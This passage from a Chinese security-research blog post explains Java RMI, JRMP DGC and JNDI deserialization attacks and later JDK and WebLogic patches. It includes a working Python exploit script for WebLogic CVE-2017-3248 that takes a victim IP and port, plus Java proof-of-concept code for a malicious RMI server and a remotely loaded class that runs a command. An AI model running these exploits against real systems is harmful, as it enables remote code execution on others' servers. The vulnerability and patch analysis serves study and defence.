5061636b616765496e666f3b787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b6167657371'
  22. data2 = '007e00034c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00054c000a696d706c56656e646f7271007e00054c000b696d706c56657273696f6e71007e000578707702000078fe00fffe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c000078707750210000000000000000000d3139322e3136382e312e323237001257494e2d4147444d565155423154362e656883348cd6000000070000{0}ffffffffffffffffffffffffffffffffffffffffffffffff78fe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c0000787077200114dc42bd07'.format('{:04x}'.format(dport))
  23. data3 = '1a7727000d3234322e323134'
  24. data4 = '2e312e32353461863d1d0000000078'
  25. for d in \[data1,data2,data3,data4\]:
  26. sock.send(d.decode('hex'))
  27. time.sleep(2)
  28. print('send request payload successful,recv length:%d'%(len(sock.recv(2048))))
  29. def send\_payload\_objdata(sock, data):
  30. payload\='056508000000010000001b0000005d010100737201787073720278700000000000000000757203787000000000787400087765626c6f67696375720478700000000c9c979a9a8c9a9bcfcf9b939a7400087765626c6f67696306fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200025b42acf317f8060854e002000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200106a6176612e7574696c2e566563746f72d9977d5b803baf010300034900116361706163697479496e6372656d656e7449000c656c656d656e74436f756e745b000b656c656d656e74446174617400135b4c6a6176612f6c616e672f4f626a6563743b78707702000078fe010000'
  31. payload+=data
  32. payload+='fe010000aced0005737200257765626c6f6769632e726a766d2e496d6d757461626c6553657276696365436f6e74657874ddcba8706386f0ba0c0000787200297765626c6f6769632e726d692e70726f76696465722e426173696353657276696365436f6e74657874e4632236c5d4a71e0c0000787077020600737200267765626c6f6769632e726d692e696e7465726e616c2e4d6574686f6444657363726970746f7212485a828af7f67b0c000078707734002e61757468656e746963617465284c7765626c6f6769632e73656375726974792e61636c2e55736572496e666f3b290000001b7878fe00ff'
  33. payload = '%s%s'%('{:08x}'.format(len(payload)/2 + 4),payload)
  34. sock.send(payload.decode('hex'))
  35. time.sleep(2)
  36. sock.send(payload.decode('hex'))
  37. res = ''
  38. try:
  39. while True:
  40. res += sock.recv(4096)
  41. time.sleep(0.1)
  42. except Exception:
  43. pass
  44. return res
  45. def exploit(dip, dport, path\_ysoserial, jrmp\_listener\_ip, jrmp\_listener\_port, jrmp\_client):
  46. sock = socket.socket(socket.AF\_INET, socket.SOCK\_STREAM)
  47. sock.settimeout(65)
  48. server\_addr = (dip, dport)
  49. t3\_handshake(sock, server\_addr)
  50. build\_t3\_request\_object(sock, dport)
  51. payload = generate\_payload(path\_ysoserial, jrmp\_listener\_ip, jrmp\_listener\_port, jrmp\_client)
  52. print("payload: " + payload)
  53. rs\=send\_payload\_objdata(sock, payload)
  54. print('response: ' + rs)
  55. print('exploit completed!')
  56. if \_\_name\_\_\=="\_\_main\_\_":
  57. #check for args, print usage if incorrect
  58. if len(sys.argv) !\= 7:
  59. print('\\nUsage:\\nexploit.py \[victim ip\] \[victim port\] \[path to ysoserial\] '
  60. '\[JRMPListener ip\] \[JRMPListener port\] \[JRMPClient\]\\n')
  61. sys.exit()
  62. dip = sys.argv\[1\]
  63. dport = int(sys.argv\[2\])
  64. path\_ysoserial = sys.argv\[3\]
  65. jrmp\_listener\_ip = sys.argv\[4\]
  66. jrmp\_listener\_port = sys.argv\[5\]
  67. jrmp\_client = sys.argv\[6\]
  68. exploit(dip, dport, path\_ysoserial, jrmp\_listener\_ip, jrmp\_listener\_port, jrmp\_client)

然后就是受害在dgc中触发jrmp请求之前部署好的服务器,返回的序列化数据为恶意payload,在dgc层面反序列化从而导致反序列化漏洞

下图为在linux上部署的jrmp服务器接收到来自受害终端来组DGC层面的jrmp请求记录:

image.png

最后我们去受害环境里面看下对应的命令是否执行:

image.png

可以看到命令执行成功。

3)、对远程调用过程中传输的参数或返回对象操作实现攻击利用

Rgeistry+Server代码(这里笔者直接在ysoserial 项目里面建的,所以构造payload的时候直接调用ysoserial方法函数):将远程方法test()调用返回的对象设置为cc2的构造的优先队列对象。

  1. package ysoserial.payloads.util;
  2. import java.rmi.registry.LocateRegistry;
  3. import java.rmi.registry.Registry;
  4. public class RmiRegistry {
  5. public static void main(String\[\] args) throws Exception{
  6. Registry registry \= LocateRegistry.createRegistry(9999);
  7. // (server)绑定对象到注册中心,并给他取名为hello
  8. EvalClass evalClass \= new EvalClassImp();
  9. registry.bind("eval",evalClass);
  10. System.out.println("open port for rmi for 9999:hellos");
  11. }
  12. }
  13. package ysoserial.payloads.util;
  14. import java.rmi.Remote;
  15. import java.rmi.RemoteException;
  16. public interface EvalClass extends Remote {
  17. Object test() throws RemoteException;
  18. }
  19. package ysoserial.payloads.util;
  20. import org.apache.commons.collections4.comparators.TransformingComparator;
  21. import org.apache.commons.collections4.functors.InvokerTransformer;
  22. import java.rmi.RemoteException;
  23. import java.rmi.server.UnicastRemoteObject;
  24. import java.util.PriorityQueue;
  25. public class EvalClassImp extends UnicastRemoteObject implements EvalClass {
  26. public EvalClassImp() throws RemoteException {
  27. super();
  28. }
  29. @Override
  30. public Object test() throws RemoteException {
  31. try {
  32. final Object templates \= Gadgets.createTemplatesImpl("calc");
  33. // mock method name until armed
  34. final InvokerTransformer transformer \= new InvokerTransformer("toString", new Class\[0\], new Object\[0\]);
  35. // create queue with numbers and basic comparator
  36. final PriorityQueue<Object\> queue \= new PriorityQueue<Object\>(2,new TransformingComparator(transformer));
  37. // stub data for replacement later
  38. queue.add(1);
  39. queue.add(1);
  40. // switch method called by comparator
  41. Reflections.setFieldValue(transformer, "iMethodName", "newTransformer");
  42. // switch contents of queue
  43. final Object\[\] queueArray \= (Object\[\]) Reflections.getFieldValue(queue, "queue");
  44. queueArray\[0\] \= templates;
  45. queueArray\[1\] \= 1;
  46. return queue;
  47. } catch (Exception e) {
  48. e.printStackTrace();
  49. }
  50. return 0;
  51. }
  52. }

client代码:

  1. import ysoserial.payloads.util.EvalClass;
  2. import java.rmi.NotBoundException;
  3. import java.rmi.RemoteException;
  4. import java.rmi.registry.LocateRegistry;
  5. import java.rmi.registry.Registry;
  6. public class RmiClient {
  7. public static void main(String\[\] args) {
  8. try {
  9. Registry registry = LocateRegistry.getRegistry("localhost", 9999);
  10. EvalClass evalClass = (EvalClass) registry.lookup("eval");
  11. System.out.println(evalClass.test());
  12. } catch (RemoteException e) {
  13. e.printStackTrace();
  14. } catch (NotBoundException e) {
  15. e.printStackTrace();
  16. }
  17. }
  18. }
  19. package ysoserial.payloads.util;
  20. import java.rmi.RemoteException;
  21. public interface EvalClass {
  22. Object test() throws RemoteException;
  23. }

先运行 server+registry代码,然后运行client:如下,成功触发调用链执行命令:

image.png

这里有一个小细节,client项目里面要有cc2的依赖才行。(org.apache.commons.collections4)

同时这里有一个问题,可以发现上述情况,受害是发起请求的客户端,服务端我们构造了一个类其一个远程方法中返回一个恶意对象,客户端要对其远程方法进行调用从而触发漏洞,而且客户端同时要存在对应构造的类的接口类定义,所以实际场景中这种情况很难利用。

主要的攻击原理就是上面这三个,将这个三个原理运用到上文我们提到的通信流程里面,即可完成client 、server 、 Registry之间的相互攻击。

0x03 JNDI

上面攻击场景分析清楚之后,会发现为啥根本没有提到JNDI,那为什么java反序列化大家只要一提起rmi就会想到jndi呢,这里我们来看下结合JNDI和rmi反序列化实现的攻击思路

一、原理:

开始我们了解到jndi全称叫java name and Directory interface,而java中常见的命名和目录服务就有rmi的形式。

所以当我们使用jndi客户端的lookup方法的时候,如果参数是可控,那么就会请求到我们构造的rmi上面,返回一个我们可控的对象。而JNDI的客户端对这个对象处理的时候触发了一些危险的行为,导致客户端失陷。利用这个原理的漏洞常见的有:log4j2、weblogic中的CVE-2018-3191。

这个rmi结合JNDI出现的漏洞,原理和我们上文提到的“对远程调用过程中传输的参数或返回对象操作实现的攻击利用”场景是类似的原理就,这里JNDI客户端虽然不是直接反序列化回传对象触发的漏洞,但是差不多,其在对rmiserver的返回对象(下文的Reference对象)进行操作的时候触发的调用链。

这里我们选择的对象是Reference对象,jndi客户端lookup方法里面对从rmi server获取的到的reference对象的时候会去加载里面的className参数对应的对象,当加载不到的时候,会从urlclassloader加载,加载的地址是factoryLocation参数,这里我们构造一个恶意类的绑定到对应地址,恶意类的构造方法或者初始化方法里面实现一些恶意代码,即可;客户端会对这个恶意类进行加载和创建实例。

二、代码实现

这里的代码实现是:

Server和Registry放到一起:

  1. package rmi;
  2. import com.sun.jndi.rmi.registry.ReferenceWrapper;
  3. import org.apache.commons.collections.Transformer;
  4. import org.apache.commons.collections.functors.ChainedTransformer;
  5. import org.apache.commons.collections.functors.ConstantTransformer;
  6. import org.apache.commons.collections.functors.InvokerTransformer;
  7. import org.apache.commons.collections.map.HashedMap;
  8. import org.apache.commons.collections.map.LazyMap;
  9. import sun.rmi.transport.StreamRemoteCall;
  10. import javax.naming.Reference;
  11. import java.rmi.AlreadyBoundException;
  12. import java.rmi.RemoteException;
  13. import java.rmi.registry.LocateRegistry;
  14. import java.rmi.registry.Registry;
  15. public class RmiServer {
  16. public static void main(String\[\] args)throws Exception {
  17. try {
  18. //获取远程注册中心
  19. Registry registry \=LocateRegistry.createRegistry(9999);
  20. Reference reference \= new Reference("Calc","Calc","http://127.0.0.1:8001/");
  21. ReferenceWrapper referenceWrapper \= new ReferenceWrapper(reference);
  22. registry.bind("Calc",referenceWrapper);
  23. System.out.println("open port for rmi for 9999:Calc");
  24. } catch (RemoteException | AlreadyBoundException e) {
  25. e.printStackTrace();
  26. }
  27. }
  28. }

Client:

  1. import javax.naming.InitialContext;
  2. import javax.naming.NamingException;
  3. public class JndiClient {
  4. public static void main(String\[\] args) throws NamingException {
  5. new InitialContext().lookup("rmi://127.0.0.1:9999/Calc");
  6. }
  7. }

恶意类:

Calc,这里我们直接使用python 起http服务绑定Calc.class:

image.png

image.png

  1. import java.io.IOException;
  2. public class Calc {
  3. static {
  4. try {
  5. Runtime.getRuntime().exec("calc");
  6. } catch (IOException e) {
  7. e.printStackTrace();
  8. }
  9. }
  10. }

先运行server,然后运行JNDIClient,如下图成功执行命令:

image.png

这里我们简单看下流量:

三、流量分析:

第一部分流量,客户端向 rmi Registry查询Calc对象,rmi Registry返回一个ReferenceWrapper对象的存根:

image.png

下图中的3809转成十进制为14345端口,所以骨根再14345端口上。

image.png

第二部分流量,客户端向 骨根对象的发起请求:

image.png

如下图,最终客户端最终获取到了一个Reference对象:

image.png

第三部分流量:JNDI客户端尝试解析Reference对象的时候,触发远程加载恶意类的流量(远程地址是reference对象里面的factoryLocation):

image.png

四、代码分析

接下来我们来看看JNDI客户端里面怎么触发的加载类:

整个的调用链如下:

image.png

简单分析下,在JNDI客户端中我们调用InitalContext类lookup方法查找rmi对象,跟进到GenericURLContext的lookup方法里面:

image.png

上图中很清楚看出,当传入的rmi形式的参数的时候,最终是调用RegistryContext的lookup来实现的,继续跟进,如下图,可以看到在RegistryContext里面的lookup中会调用registry.lookup方法从而获取到我们构造的ReferenceWrapper对象,然后调用this.decodeObject来处理该对象:

image.png

跟进decodeObject方法的实现,如下图,里面对传入的对象类型进行了判断,如果是一个Reference对象,就调用NamingManager.getObjectInstance()的方式来获取到相关对象的实例,不妨想一下这里是想获取到什么对象的实例呢?

image.png

跟进NamingManager.getObjectInstance的实现:如下图,粗略读下代码其实是可以看出这个方法就是想要从我们传入的Reference对象中获取到一个ObjectFactory对象,其在304行到338行,就是判断当reference对象存在的时候尝试从refenence还原出对应的ObjectFactory对象。可以看到在319行的时候调用getObjectFactoryFormReference方法获取到factory对象。

image.png

接下来,继续跟进getObjectFactoryFromReference()的实现:如下图,这个方法里面其实就是三部分,第一部分就是尝试使用本地的加载器来加载,其实就是Appclassloader,很明显本地肯定加载不到factoryName,因为这个factoryName是我们构造Reference对象的时候传入的恶意类的类名,即EvalClass2。第二部分则是判断对应的reference对象里面有没有传入codebase即(factoryLocation 参数),如果传入了就调用helper.loadClass(name,codebase)来实现。第三部分就是获取到对应类之后调用newInstance获取类的实例。

image.png

这里我们详细看看,第二部分中的helper.loadClass(name,codebase)怎么实现的:如下图,这里新创建了一个URLClassloader去加载className

image.png

继续跟进调用的loadClass方法:如下图,其实就是直接Class.forName并传入了true,所以这里会做初始化,如果我们在恶意类里面的相关命令执行的代码写到的是初始化模块里面,则在这里就会触发了,如果是在构造方法里面写的相关命令执行的代码则是在newInstance里面触发。

image.png

0x04 JDK版本以及补丁相关

上文所有的场景,均使用的是jdk8_031,这一低版本的JDK;

接下来我们来分析下上文提到的三种场景中jdk对其的影响;

下文的实验环境都换成jdk8_151:

一、对(如Server端bind操作)发送的存根对象操作的实现的攻击利用

这里我们使用上面相同的代码,然后将jdk调整为jdk8_151测试:

Regietry:

image.png

Server端执行bind:

image.png

运行之后Registry报错如下:可以看到这里报错意思是对象过滤流拒绝了:

image.png

这里我们去看看这个ObjectInputFilter类,其实就是可以继承java.io.ObjectInputFilter类重写checkInput方法实现自定义的过滤器

如下可以看到其实就是一个接口类,主要方法就是checkInput

image.png

并且这个jdk版本下我们去看ObjectInputStream的时候会发现,其静态初始化代码里面出现了一个set该接口类的实例情况:

image.png

而对应到我们这个场景,设置的实现了ObjectInputFilter接口的类从RegistryImp中拿到的:

image.png
如下栈中我们可以看到,是设置filter:

image.png

然后反序列化的时候会使用这个filter对其进行过滤:

如下栈:当ObjectInputStream的readObject里面调用checkInput()的时候

image.png

image.png

最后就是来到了RegistryImp的regisrtyFilter()方法

image.png

我们来看这个方法:

  1. private static Status registryFilter(FilterInfo var0) {
  2. if (registryFilter != null) {
  3. Status var1 \= registryFilter.checkInput(var0);
  4. if (var1 != Status.UNDECIDED) {
  5. return var1;
  6. }
  7. }
  8. if (var0.depth() \> 20L) {
  9. return Status.REJECTED;
  10. } else {
  11. Class var2 \= var0.serialClass();
  12. if (var2 \== null) {
  13. return Status.UNDECIDED;
  14. } else {
  15. if (var2.isArray()) {
  16. if (var0.arrayLength() \>= 0L &amp;&amp; var0.arrayLength() \> 10000L) {
  17. return Status.REJECTED;
  18. }
  19. do {
  20. var2 \= var2.getComponentType();
  21. } while(var2.isArray());
  22. }
  23. if (var2.isPrimitive()) {
  24. return Status.ALLOWED;
  25. } else {
  26. return String.class != var2 &amp;&amp; !Number.class.isAssignableFrom(var2) &amp;&amp; !Remote.class.isAssignableFrom(var2) &amp;&amp; !Proxy.class.isAssignableFrom(var2) &amp;&amp; !UnicastRef.class.isAssignableFrom(var2) &amp;&amp; !RMIClientSocketFactory.class.isAssignableFrom(var2) &amp;&amp; !RMIServerSocketFactory.class.isAssignableFrom(var2) &amp;&amp; !ActivationID.class.isAssignableFrom(var2) &amp;&amp; !UID.class.isAssignableFrom(var2) ? Status.REJECTED : Status.ALLOWED;
  27. }
  28. }
  29. }
  30. }

这里最后几行的可以看到存在一个白名单判断机制,只有符合String\Number\Remote\Proxy\UnicaseRef\RMIClientSocketFactory\RMIServerSocketFactory\Actibation\UID的类才能通过,所以我们构造的对象里面的AnnotationInvovationHande类以及后面优先队列等都被过滤,最后被拒绝。

上述改变是在jdk 8_121 开始的,就是rmi中远程发送的序列化存根对象必须是以上白名单里面的。

这里我们简单来看下白名单里面的几个类会发现像UnicaseRef UID 这种其实就是为了能让上文我们提到的正常bind方法里面传输的序列化对象能够被顺利反序列化!其中UnicaseRef里面是记载了骨根所在位置的信息。

二、对jrmp中dgc操作实现的攻击利用

这个情况下的攻击利用,上文是通过weblogic的漏洞cve-2017-3248来讲的,所以这里我们直接去看下对应漏洞的补丁即可:

这个cve-2017-3248的原理是,发送一个java.rmi.registry.Registry代理对象序列化内容过去,这个动态代理对象里面的InvocationHandler是一个RemoteObjectInvocationHandler,其里面封装了一个我们构造好的UnicaseRef对象(其实就是指向恶意的jrmp 监听的地址上),服务器收到这个请求之后,会调用dgc请求,发一个dirty去骨根处”租借“,此时就请求到我们设置的jrmp 的监听,本来是要返回一个lease对象,这个对象里面是对租期的相关描述;但是这里我们设置的监听返回的是一个恶意对象(如cc2中构造好的优先队列、或者cc1里面的被代理的Lazymap对象),服务器接收到之后就会反序列化从而触发调用链。

如下是weblogic对cve-2017-3248漏洞的修复:

这里涉及到了weblogic里面的很多内容,笔者之前曾对weblogic全系列反序列化复现调试过才知道,但是文章篇幅有限所以这里我们简单的说以下,通俗一点说就是:weblogic对其处理输入流的对象进行了修改(其实就是这个类:weblogic.rjvm.InboundMsgAbbrev$ServerChannelInputStream.class),在这个类里面重写JDK中ObjectInputStream里面的resolveProxyClass方法,在这个方法里面将Registry这个类加入了黑名单;从而使Registry在这个通信过程中传输会反序列化失败。

如下是这个方法的实现:

image.png

这里我们简单讲下为什么上述场景中重写JDK中ObjectInputStream里面的resolveProxyClass方法就能切断反序列化,如下是笔者总结ObjectInputStream的readObject的调用过程:

image.png

如上图我们可以看到当存在代理类的情况的时候反序列化的时候,去获取相关类名的时候,是要通过resolveProxyClass来实现的;所以weblogic 通过重写了这个resolveProxyClass就可以自定义其实现,对相关类进行过滤,并且如下图我们也可以看到其就是添加了个黑名单过滤,然后又是调用父类ObjectInputStream的resolveProxyClass:

image.png

当然这个修复后续又被各种绕过,从而有了一系列的weblogic反序列化漏洞,如CVE-2018-2628、CVE-2018-2893、CVE-2018-3245等都是对这个黑名单的绕过。

三、对远程调用过程中传输的参数或返回对象进行操作实现的攻击利用

这个场景我们主要拿JNDI 客户端请求rmi Server的场景来分析,因为上文我们也提到原始场景下很难被使用在真实攻击场景里面;

首先回顾下上文提到的jndi客户端和rmi使用导致的远程任意类加载的漏洞:

jndi客户端请求获取rmi Registry上绑定的对象, Server返回了一个构造好的Reference(Wapper)对象给它(这里面的过程具体来说是,Registry注册中心返回对应Reference对象的存根给jndi客户端,jndi客户端根据存根里面的相关地址信息,向Server请求该对象的骨根,Server返回一个构造好的ReferenceWrapper对象给jndi客户端);JNDI对返回的ReferenceWrapper对象处理的时候,会尝试加载记录在其内的className这个类并创建实例,当本地加载不到的时候,会判断是否存在factoryLocation参数,有的话就使用URLClassloader去加载,而这个远程地址是可控的,从而导致了远程任意类加载并实例化,那么只要是这个远程加载的类的初始化方法或者构造方法里面的代码都会被执行,从而造成任意代码执行漏洞。如果对这个过程还不是特别了解也可以参考笔者之前写的一篇文章:

老生常谈的JNDI——JDK8下的JNDI,此文里面对JNDI客户端为什么会触发任意代码执行的相关代码细节进行了详细分析。

那么这里我们使用JDK8_151来测试的时候会发生什么呢,我们来看下:

服务端:

image.png

JNDI Client:

image.png

HttpServer:

image.png

运行client:

报错如下:

image.png

The object factory is untrusted. Set the system property 'com.sun.jndi.rmi.object.trustURLCodebase' to 'true'.

这个factory不被信任,要把com.sun.jndi.rmi.object.trustURLCodebase属性设置成true才行;

其实就是JNDI客户端的om.sun.jndi.rmi.registry.RegistryContext的decodeObject方法里面加了一个属性判断,如下对Reference的处理:可以看到对远程加载类的场景,不光Reference对象里面要存在factoryLocation参数,还要一个trustURLCodeBase属性是true才行。

image.png

如果对上面这个代码还不太懂,强烈建议读以下下面这个文章:

老生常谈的JNDI——JDK8下的JNDI

这个限制其实也是在JDK8_121加上去的,核心就是通过切断远程加载类的行为,不让加载远程的类。(同时这里不妨想下是否能够对其绕过,最简单的思路就是,不让远程加载,那就本地加载呗,找到一个本地的类被加载过程能触发利用链的或者存在sink点,具体也可以参见上述推荐的文章)

对修复方案总结:

这里我们不妨来总结下上述三种期刊对于java反序列化漏洞的修复措施:

1、通过为ObjectInputStream设置一个ObjectInputFilter 来干扰正常JDK的OIS( 后文后写OIS)的反序列化,然后通过白名单类名对要反序列化的类容过滤(JDK对相关场景下下(JAVA rmi)反序列化漏洞的修复方式)

2、通过重写原生JDK中的OIS的resolve(Proxy)Class来干扰相关要反序列化的类名获取,通过黑名单来过滤恶意类(weblogic对反序列化漏洞的修复思路);这里我们多提一嘴,前段时间比较火的RASP(Runtime application self-protection)技术里面对于反序列化漏洞的防御也是使用的这种思路,通过javaagent技术注入jvm,修改OIS的resolve(Proxy)Class代码实现,在其中加入相关恶意类的黑名单,从而阻止相关恶意类的类名的获取,来阻止对其的反序列化。

3、第三种情况中JNDI导致的漏洞其实严格意义上来说,这不是一个反序列化漏洞,因为触发漏洞的点不是对相关对象进行反序列化的过程,只不过是借助了rmi服务而已,但是这里我们也来总结下这种JNDI导致类远程加载漏洞的修复方案:直接就把远程加载的途径ban掉,默认情况下不允许远程加载其他类。(包括后续JNDI借助LDAP服务实现的漏洞也是一样(8_121<=JDK<8_191),修复措施就是禁止远程加载其他类){JDK对JNDI漏洞的修复方式}

0x05 总结

简单总结下反序列化漏洞,其实就是大家最常听说的,对不受信任的序列化数据没有进行检测、校验、限制,从而导致在其反序列化的时候出现相关意料之外的操作,这些操作有的能任意命令执行,有的能任意代码执行等。所以对其的修复方案主要就是不让其能被反序列化。其中最为常见的手段就是上文提到的为OIS设置ObjectInputFilter 和重写resolve(Proxy)Class来实现对相关恶意类的过滤,这里既可以设置黑名单也可以设置白名单;weblogic 官方采用的是前者,但是似乎不太乐观,经常会出现被绕过的情况;

除此之外,对JAVA RMI底层调用逻辑以及其DGC调用关系的学习的确能让人受益匪浅,当再去看weblogic系统的反序列化漏洞的时候有一种豁然开朗的感觉。

参考文章:
https://xz.aliyun.com/t/7264#toc-0
https://paper.seebug.org/1091/
https://www.anquanke.com/post/id/257452

笔者才疏学浅,若文中存在错误观点,欢迎斧正。

  • 发表于 2023-05-25 09:00:00
  • 阅读 ( 9069 )
  • 分类:漏洞分析

0 条评论

Ga0WeI
Ga0WeI

安全从业者

16 篇文章

站长统计